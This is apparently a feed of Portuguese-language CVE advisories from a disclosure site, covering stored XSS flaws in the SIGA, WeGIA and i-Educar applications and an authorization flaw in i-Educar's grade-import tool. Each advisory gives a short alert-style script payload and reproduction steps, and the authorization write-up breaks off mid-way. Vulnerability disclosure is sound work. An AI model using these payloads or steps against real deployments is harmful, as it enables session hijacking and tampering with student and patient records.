https://www.cvehunters.com/pt/categories/siga/ Recent content on CVE-Hunters https://www.cvehunters.com/pt/p/cve-2026-6990/ https://www.cvehunters.com/pt/p/cve-2026-6990/ <h2 id="cve-2026-6990-cross-site-scripting-xss-armazenado-em-novo-da-função-sigawfappresponsavelnovo-parâmetro-descrição">CVE-2026-6990: Cross-Site Scripting (XSS) armazenado em Novo da função <code>/sigawf/app/responsavel/novo</code> parâmetro <code>Descrição</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-6990" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-6990</a></strong></em></p> </blockquote> <p>##Resumo</p> <p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint <code>/sigawf/app/responsavel/novo</code> do aplicativo SIGA. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro <code>Descrição</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página <code>/sigawf/app/responsavel/listar</code> é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>/sigawf/app/responsavel/novo</code></p><h2 id="cve-2026-6990-cross-site-scripting-xss-armazenado-em-novo-da-função-sigawfappresponsavelnovo-parâmetro-descrição">CVE-2026-6990: Cross-Site Scripting (XSS) armazenado em Novo da função <code>/sigawf/app/responsavel/novo</code> parâmetro <code>Descrição</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-6990" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-6990</a></strong></em></p> </blockquote> <p>##Resumo</p> <p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint <code>/sigawf/app/responsavel/novo</code> do aplicativo SIGA. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro <code>Descrição</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página <code>/sigawf/app/responsavel/listar</code> é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>/sigawf/app/responsavel/novo</code></p> <p>Parâmetro: <code>Descrição</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(document.cookie)//</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="passos-para-executar">Passos para executar: </h3><p style="text-align: justify;"> Registre o payload no campo <code>Descrição</code> no endpoint <code>/sigawf/app/responsavel/novo</code>. <p><img src="/p/cve-2026-6990/image.png" width="924" height="266" srcset="/p/cve-2026-6990/image_hu_257390f57da3ef36.png 480w, /p/cve-2026-6990/image_hu_e31e27a952009eca.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="347" data-flex-basis="833px" /></p> <p style="text-align: justify;"> Depois disso, o XSS pode ser acionado abrindo o endpoint <code>/sigawf/app/responsavel/listar</code>.</p> <p><img src="/p/cve-2026-6990/image-1.png" width="478" height="164" srcset="/p/cve-2026-6990/image-1_hu_4ede61fcf518e8ab.png 480w, /p/cve-2026-6990/image-1_hu_6277af4afca73498.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="291" data-flex-basis="699px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/ViniCastro2001/Security_Reports/tree/main/siga/Stored-XSS-Responsavel" target="_blank" rel="noopener" >https://github.com/ViniCastro2001/Security_Reports/tree/main/siga/Stored-XSS-Responsavel</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/vinicius-gross-castro" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/viniciusCastro50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/vinicius-gross-castro" target="_blank" rel="noopener" >Vinicius Castro</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 25 Apr 2026 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2026-40282/ https://www.cvehunters.com/pt/p/cve-2026-40282/ <h2 id="cve-2026-40282-cross-site-scripting-xss-armazenado-em-novo-da-função-intercorrencia_visualizarphp">CVE-2026-40282: Cross-Site Scripting (XSS) armazenado em Novo da função <code>intercorrencia_visualizar.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-40282" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-40282</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada permite que um usuário autenticado injete JavaScript malicioso na página de notificações do Intercorrências, o qual é executado quando o usuário acessa a página, possibilitando o sequestro de sessão e a tomada de controle da conta.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não higieniza ou codifica corretamente o campo de nome de usuário, que é exibido em notificações do sistema e aceita entrada controlada pelo usuário. Um atacante pode injetar HTML ou JavaScript malicioso neste campo ao criar ou modificar um usuário.</br>Quando uma “intercorrência” é registrada, uma notificação é gerada. Ao clicar nesta notificação, o aplicativo renderiza o nome de usuário na interface sem o devido escape, fazendo com que qualquer código injetado seja executado no navegador.</br>Este comportamento demonstra codificação de saída inadequada, resultando em uma vulnerabilidade de XSS armazenado.</p><h2 id="cve-2026-40282-cross-site-scripting-xss-armazenado-em-novo-da-função-intercorrencia_visualizarphp">CVE-2026-40282: Cross-Site Scripting (XSS) armazenado em Novo da função <code>intercorrencia_visualizar.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-40282" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-40282</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada permite que um usuário autenticado injete JavaScript malicioso na página de notificações do Intercorrências, o qual é executado quando o usuário acessa a página, possibilitando o sequestro de sessão e a tomada de controle da conta.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não higieniza ou codifica corretamente o campo de nome de usuário, que é exibido em notificações do sistema e aceita entrada controlada pelo usuário. Um atacante pode injetar HTML ou JavaScript malicioso neste campo ao criar ou modificar um usuário.</br>Quando uma “intercorrência” é registrada, uma notificação é gerada. Ao clicar nesta notificação, o aplicativo renderiza o nome de usuário na interface sem o devido escape, fazendo com que qualquer código injetado seja executado no navegador.</br>Este comportamento demonstra codificação de saída inadequada, resultando em uma vulnerabilidade de XSS armazenado.</p> <ul> <li>Endpoint vulnerável: <code>intercorrencia_visualizar.php</code></li> </ul> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">1</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert("XSS")</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="passos-para-reproduzir">Passos para reproduzir: </h3><p style="text-align: justify;"><b>1.</b> Cadastre um paciente onde o campo "Nome" ou "Sobrenome" contenha o payload.</br></br><b>2.</b> Adicione uma entrada de "Intercorrência" para este usuário.</br></br><b>3.</b> Navegue até a página de notificações "Intercorrências" e clique em "Recentes" e "Histórico". Esta vulnerabilidade afeta ambas as páginas.</br></br><b>4.</b> Observe que o payload é executado no navegador:</p> <p><img src="/p/cve-2026-40282/image.png" width="603" height="330" srcset="/p/cve-2026-40282/image_hu_dfc5bc911aa9fe3a.png 480w, /p/cve-2026-40282/image_hu_581b1a4709b48d43.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="182" data-flex-basis="438px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-r6h8-7vxv-q8pp" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-r6h8-7vxv-q8pp</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://br.linkedin.com/in/thiagoescarrone" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/thiago50x50.png" loading="lazy" /></a> <a class="link" href="https://br.linkedin.com/in/thiagoescarrone" target="_blank" rel="noopener" >Thiago Escarrone</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 17 Apr 2026 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2026-40283/ https://www.cvehunters.com/pt/p/cve-2026-40283/ <h2 id="cve-2026-40283-cross-site-scripting-xss-armazenado-em-novo-da-função-profile_pacientephp">CVE-2026-40283: Cross-Site Scripting (XSS) armazenado em Novo da função <code>profile_paciente.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-40283" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-40283</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada permite que um usuário autenticado injete JavaScript malicioso através do campo “Nome” na página “Informações Pacientes”. O código malicioso é armazenado e executado quando as informações do paciente são visualizadas.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não higieniza ou codifica corretamente o campo "Nome", que aceita entrada controlada pelo usuário. Um invasor pode inserir HTML ou JavaScript malicioso nesse campo ao criar ou editar um paciente.</br></br>Ao acessar a página “Informações Pacientes”, esse valor é renderizado no DOM sem o devido tratamento, o que leva à execução do código injetado no navegador.</br></br>Esse comportamento indica codificação de saída inadequada e resulta em uma vulnerabilidade XSS armazenada.</p><h2 id="cve-2026-40283-cross-site-scripting-xss-armazenado-em-novo-da-função-profile_pacientephp">CVE-2026-40283: Cross-Site Scripting (XSS) armazenado em Novo da função <code>profile_paciente.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-40283" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-40283</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada permite que um usuário autenticado injete JavaScript malicioso através do campo “Nome” na página “Informações Pacientes”. O código malicioso é armazenado e executado quando as informações do paciente são visualizadas.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não higieniza ou codifica corretamente o campo "Nome", que aceita entrada controlada pelo usuário. Um invasor pode inserir HTML ou JavaScript malicioso nesse campo ao criar ou editar um paciente.</br></br>Ao acessar a página “Informações Pacientes”, esse valor é renderizado no DOM sem o devido tratamento, o que leva à execução do código injetado no navegador.</br></br>Esse comportamento indica codificação de saída inadequada e resulta em uma vulnerabilidade XSS armazenada.</p> <ul> <li>Endpoint vulnerável: <code>profile_paciente.php</code></li> </ul> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">h1</span><span class="p">></span> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p"></</span><span class="nt">script</span><span class="p">></</span><span class="nt">h1</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="passos-para-reproduzir">Passos para reproduzir: </h3><p style="text-align: justify;"><b>1.</b> Cadastre um paciente onde o campo “Nome” contenha o código malicioso.</br></br><b>2.</b> Navegue até a página “Informações do Paciente” do paciente criado.</br></br><b>3.</b> Observe que o código malicioso é executado no navegador:</p> <p><img src="/p/cve-2026-40283/image.png" width="1360" height="737" srcset="/p/cve-2026-40283/image_hu_7406d057c64135fd.png 480w, /p/cve-2026-40283/image_hu_47e3d68f29444a6d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="184" data-flex-basis="442px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-x74c-gwj9-6cwr" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-x74c-gwj9-6cwr</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://br.linkedin.com/in/thiagoescarrone" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/thiago50x50.png" loading="lazy" /></a> <a class="link" href="https://br.linkedin.com/in/thiagoescarrone" target="_blank" rel="noopener" >Thiago Escarrone</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 17 Apr 2026 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2026-40284/ https://www.cvehunters.com/pt/p/cve-2026-40284/ <h2 id="cve-2026-40284-cross-site-scripting-xss-armazenado-em-novo-da-função-listar_despachosphp">CVE-2026-40284: Cross-Site Scripting (XSS) armazenado em Novo da função <code>listar_despachos.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-40284" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-40284</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada permite que um usuário autenticado injete JavaScript malicioso através do campo “Destinatário”. O código malicioso é armazenado e executado posteriormente ao visualizar a página de despacho, afetando outros usuários.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue higienizar ou escapar corretamente o campo “Destinatário”, que é preenchido com dados controlados pelo usuário (nome do usuário). Quando um despacho é criado usando um nome malicioso contendo HTML/JavaScript, esse valor é armazenado no sistema.</br></br>Durante a renderização da página de listagem de despachos, o aplicativo insere esses dados no DOM usando .html(), fazendo com que o navegador interprete e execute o código injetado.</br></br>Isso resulta em uma vulnerabilidade de XSS armazenado devido à codificação de saída inadequada dos dados controlados pelo usuário.</p><h2 id="cve-2026-40284-cross-site-scripting-xss-armazenado-em-novo-da-função-listar_despachosphp">CVE-2026-40284: Cross-Site Scripting (XSS) armazenado em Novo da função <code>listar_despachos.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-40284" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-40284</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada permite que um usuário autenticado injete JavaScript malicioso através do campo “Destinatário”. O código malicioso é armazenado e executado posteriormente ao visualizar a página de despacho, afetando outros usuários.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue higienizar ou escapar corretamente o campo “Destinatário”, que é preenchido com dados controlados pelo usuário (nome do usuário). Quando um despacho é criado usando um nome malicioso contendo HTML/JavaScript, esse valor é armazenado no sistema.</br></br>Durante a renderização da página de listagem de despachos, o aplicativo insere esses dados no DOM usando .html(), fazendo com que o navegador interprete e execute o código injetado.</br></br>Isso resulta em uma vulnerabilidade de XSS armazenado devido à codificação de saída inadequada dos dados controlados pelo usuário.</p> <ul> <li>Endpoint vulnerável: <code>listar_despachos.php</code></li> </ul> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">h1</span><span class="p">></span> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p"></</span><span class="nt">script</span><span class="p">></</span><span class="nt">h1</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="passos-para-reproduzir">Passos para reproduzir: </h3><p style="text-align: justify;"><b>1.</b> Altere o nome de um usuário (ou crie um) com o payload.</br></br><b>2.</b> Crie um despacho selecionando este usuário como “Destinatário”.</br></br><b>3.</b> Acesse a página que lista ou exibe o despacho.</br></br><b>4.</b> Observe que o payload é executado no navegador:</p> <p><img src="/p/cve-2026-40284/image.png" width="884" height="751" srcset="/p/cve-2026-40284/image_hu_b5a29259f27a9224.png 480w, /p/cve-2026-40284/image_hu_d02bb8cf295854e3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="117" data-flex-basis="282px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mccp-8446-phw5" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mccp-8446-phw5</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://br.linkedin.com/in/thiagoescarrone" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/thiago50x50.png" loading="lazy" /></a> <a class="link" href="https://br.linkedin.com/in/thiagoescarrone" target="_blank" rel="noopener" >Thiago Escarrone</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 17 Apr 2026 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2026-4355/ https://www.cvehunters.com/pt/p/cve-2026-4355/ <h2 id="cve-2026-4355-cross-site-scripting-xss-armazenado-em-novo-da-função-educar_servidor_curso_lst-parâmetro-name">CVE-2026-4355: Cross-Site Scripting (XSS) armazenado em Novo da função <code>educar_servidor_curso_lst</code> parâmetro <code>name</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-4355" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-4355</a></strong></em></p> </blockquote> <p>##Resumo</p> <p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint <code>educar_servidor_curso_lst.php</code> do aplicativo I-educar 2.11. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro <code>name</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página `<code>CurricularComponent/view</code>` é acessada pelos usuários, representando um risco de segurança significativo. <p>##Detalhes</p><h2 id="cve-2026-4355-cross-site-scripting-xss-armazenado-em-novo-da-função-educar_servidor_curso_lst-parâmetro-name">CVE-2026-4355: Cross-Site Scripting (XSS) armazenado em Novo da função <code>educar_servidor_curso_lst</code> parâmetro <code>name</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-4355" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-4355</a></strong></em></p> </blockquote> <p>##Resumo</p> <p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint <code>educar_servidor_curso_lst.php</code> do aplicativo I-educar 2.11. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro <code>name</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página `<code>CurricularComponent/view</code>` é acessada pelos usuários, representando um risco de segurança significativo. <p>##Detalhes</p> <p>Endpoint vulnerável: <code>educar_servidor_curso_lst.php</code></p> <p>Parâmetro: <code>name</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"><script>alert(1)</script> </span></span></code></pre></td></tr></table> </div> </div><h3 id="passos-para-executar">Passos para executar: </h3><p style="text-align: justify;"> Registre o payload no campo `<code>name</code>` no endpoint `<code>educar_servidor_curso_lst.php</code>`. <p><img src="/p/cve-2026-4355/image.png" width="1655" height="336" srcset="/p/cve-2026-4355/image_hu_f0d344b2348566d2.png 480w, /p/cve-2026-4355/image_hu_6c0417b053954c44.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="492" data-flex-basis="1182px" /></p> <p style="text-align: justify;"> Depois disso, o XSS pode ser acionado abrindo o endpoint `<code>educar_servidor_curso_lst.php</code>` correspondente ao nome editado. ID.</p> <p><img src="/p/cve-2026-4355/image-1.png" width="1655" height="336" srcset="/p/cve-2026-4355/image-1_hu_304eccbb94dee2b4.png 480w, /p/cve-2026-4355/image-1_hu_6a7e07ce80a625ac.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="492" data-flex-basis="1182px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/Saiipe/CVE/blob/main/i-educar%2FCVE-2026-4355.md" target="_blank" rel="noopener" >https://github.com/Saiipe/CVE/blob/main/i-educar%2FCVE-2026-4355.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/itauan" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/itauan50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/itauan" target="_blank" rel="noopener" >Itauan Santos</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 17 Mar 2026 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2026-2015/ https://www.cvehunters.com/pt/p/cve-2026-2015/ <h2 id="cve-2026-2015-a-autorização-de-nível-de-função-quebrada-bfla-permite-a-modificação-arbitrária-de-registros-de-alunos-por-meio-da-ferramenta-de-importação-de-status-final">CVE-2026-2015: A Autorização de Nível de Função Quebrada (BFLA) permite a modificação arbitrária de <code>Registros de Alunos</code> por meio da ferramenta de <code>Importação de Status Final</code>. </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-2015" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-2015</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Autorização de Nível de Função Quebrada (BFLA) foi identificada na ferramenta <code>Importação de Status Final</code> do aplicativo i-Educar. Essa falha permite que um usuário autenticado com permissões de nível <code>"Escola"</code> ignore as restrições funcionais pretendidas e modifique registros acadêmicos pertencentes a qualquer unidade escolar dentro da rede municipal.</p><h2 id="cve-2026-2015-a-autorização-de-nível-de-função-quebrada-bfla-permite-a-modificação-arbitrária-de-registros-de-alunos-por-meio-da-ferramenta-de-importação-de-status-final">CVE-2026-2015: A Autorização de Nível de Função Quebrada (BFLA) permite a modificação arbitrária de <code>Registros de Alunos</code> por meio da ferramenta de <code>Importação de Status Final</code>. </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-2015" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-2015</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Autorização de Nível de Função Quebrada (BFLA) foi identificada na ferramenta <code>Importação de Status Final</code> do aplicativo i-Educar. Essa falha permite que um usuário autenticado com permissões de nível <code>"Escola"</code> ignore as restrições funcionais pretendidas e modifique registros acadêmicos pertencentes a qualquer unidade escolar dentro da rede municipal.</p> <h2 id="detalhes">Detalhes </h2><p>Componente Vulnerável: <code>Configurações > Ferramentas > Importação de Status Final</code></p> <h2 id="poc">PoC </h2><h3 id="contexto">Contexto: </h3><p style="text-align: justify;">A conta do atacante está estritamente limitada a uma unidade escolar específica (Ensino Fundamental) com permissões de "Escola" de baixo nível. Todas as permissões administrativas ou de edição global estão desativadas.</p> <h4 id="acesso-autorizado">Acesso Autorizado: </h4><p style="text-align: justify;">Quando um usuário administrativo (com permissões globais ou locais adequadas) acessa o registro de um aluno, o menu suspenso "Status Final" fica visível e totalmente funcional, permitindo atualizações manuais de status.</p> <p><img src="/p/cve-2026-2015/image-5.png" width="397" height="303" srcset="/p/cve-2026-2015/image-5_hu_c70c79ad0e6a6e84.png 480w, /p/cve-2026-2015/image-5_hu_8f3ed5f7812ceb8e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="131" data-flex-basis="314px" /></p> <h4 id="acesso-não-autorizado-visão-do-atacante">Acesso Não Autorizado (Visão do Atacante): </h4><p style="text-align: justify;">Quando o atacante tenta editar um aluno de uma unidade escolar diferente por meio da interface padrão, o menu suspenso "Status Final" fica oculto. O sistema identifica corretamente que o usuário não possui autorização para essa função específica no frontend. <p><img src="/p/cve-2026-2015/image-6.png" width="411" height="158" srcset="/p/cve-2026-2015/image-6_hu_5510dcd616bc5d5f.png 480w, /p/cve-2026-2015/image-6_hu_7a6c2b34808b5d5b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="260" data-flex-basis="624px" /></p> <h3 id="payload">Payload: </h3><p style="text-align: justify;">O atacante identifica IDs de alunos de outras instituições (por exemplo, IDs 212, 199, 200). Um payload em CSV é preparado para forçar uma mudança de status para "Falecido".</p> <p><img src="/p/cve-2026-2015/image.png" width="894" height="190" 